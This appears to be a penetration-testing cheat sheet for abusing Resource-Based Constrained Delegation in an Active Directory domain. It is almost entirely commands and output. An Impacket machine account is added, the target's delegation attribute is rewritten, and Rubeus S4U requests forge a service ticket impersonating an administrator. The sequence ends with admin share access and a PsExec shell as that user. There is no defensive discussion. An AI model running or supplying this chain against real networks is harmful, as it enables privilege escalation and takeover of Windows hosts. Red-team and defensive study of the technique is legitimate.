Resource-Based Constrained Delegation - Generic write abuse.
git clone https://github.com/tothi/rbcd-attack
$ addcomputer.py -computer-name 'RECEPTION$' -computer-pass JteYeCym2JxkH -dc-ip 10.10.10.10 offsec.nl/jane:'Welkom123!'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Successfully added machine account RECEPTION$ with password JteYeCym2JxkH.
$ ./rbcd.py -f RECEPTION -t WIN10-TARGET -dc-ip 10.10.10.10 offsec.nl\\jane:'Welkom123!'
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Starting Resource Based Constrained Delegation Attack against WIN10-TARGET$
[*] Initializing LDAP connection to 10.10.10.10
[*] Using offsec.nl\jane account with password ***
[*] LDAP bind OK
[*] Initializing domainDumper()
[*] Initializing LDAPAttack()
[*] Writing SECURITY_DESCRIPTOR related to (fake) computer `RECEPTION` into msDS-AllowedToActOnBehalfOfOtherIdentity of target computer `WIN10-TARGET`
[*] Delegation rights modified succesfully!
[*] RECEPTION$ can now impersonate users on WIN10-TARGET$ via S4U2Proxy
Z:\> .\Rubeus.exe hash /password:JteYeCym2JxkH /user:RECEPTION /domain:offsec.nl
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: Calculate Password Hash(es)
[*] Input password : JteYeCym2JxkH
[*] Input username : RECEPTION
[*] Input domain : offsec.nl
[*] Salt : offsec.nlRECEPTION
[*] rc4_hmac : C3CA46DA95A2B9CAB36C31A3202CE355
[*] aes128_cts_hmac_sha1 : D9C29470D497E61186549BCC5517E736
[*] aes256_cts_hmac_sha1 : C4CB81B0428A8384445C981575393BADC6F468396B44D39F166754C5A896FD8A
[*] des_cbc_md5 : 528F4FE3A219FB6E
PS z:\> .\rubeus.exe s4u /user:RECEPTION$ /rc4:C3CA46DA95A2B9CAB36C31A3202CE355 /impersonateuser:JOHNDO-ADM /msdsspn:cifs/WIN10-TARGET.offsec.nl /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: S4U
[*] Using rc4_hmac hash: C3CA46DA95A2B9CAB36C31A3202CE355
[*] Building AS-REQ (w/ preauth) for: 'offsec.nl\RECEPTION$'
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIE5jCCBO[...REDACTED...]J2aWNlcy5ubA==
[*] Action: S4U
[*] Using domain controller: DC01.offsec.nl (10.10.10.10)
[*] Building S4U2self request for: '[email protected]'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for '[email protected]' to '[email protected]'
[*] base64(ticket.kirbi):
doIJHjCCCRqgAwI[...REDACTED...]DAgEBoQgwBhsET0NEJA==
[*] Impersonating user 'JOHNDO-ADM' to target SPN 'cifs/WIN10-TARGET.offsec.nl'
[*] Using domain controller: DC01.offsec.nl (10.10.10.10)
[*] Building S4U2proxy request for service: 'cifs/WIN10-TARGET.offsec.nl'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/WIN10-TARGET.offsec.nl':
doIKAjCCCf6gAw[...REDACTED...]VJWSUNFUy5OTA==
[+] Ticket successfully imported!
PS z:\> klist
Current LogonId is 0:0x7b698
Cached Tickets: (1)
#0> Client: JOHNDO-ADM @ offsec.nl
Server: cifs/WIN10-TARGET.offsec.nl @ offsec.nl
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40210000 -> forwardable pre_authent name_canonicalize
Start Time: 2/17/2021 15:12:51 (local)
End Time: 2/18/2021 1:12:51 (local)
Renew Time: 0
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
PS z:\> dir \\WIN10-TARGET.offsec.nl\c$
Directory: \\WIN10-TARGET.offsec.nl\c$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/27/2018 11:39 AM Intel
d----- 5/23/2020 8:02 AM PerfLogs
d-r--- 8/19/2020 1:20 PM Program Files
d-r--- 7/10/2020 10:30 AM Program Files (x86)
da---- 2/4/2021 8:11 AM Temp
d-r--- 9/29/2020 10:33 AM Users
d----- 2/17/2021 2:34 PM Windows
PS z:\> PsExec.exe \\WIN10-TARGET.offsec.nl cmd
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 10.0.18363.1316]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
offsec.nl\JOHNDO-ADM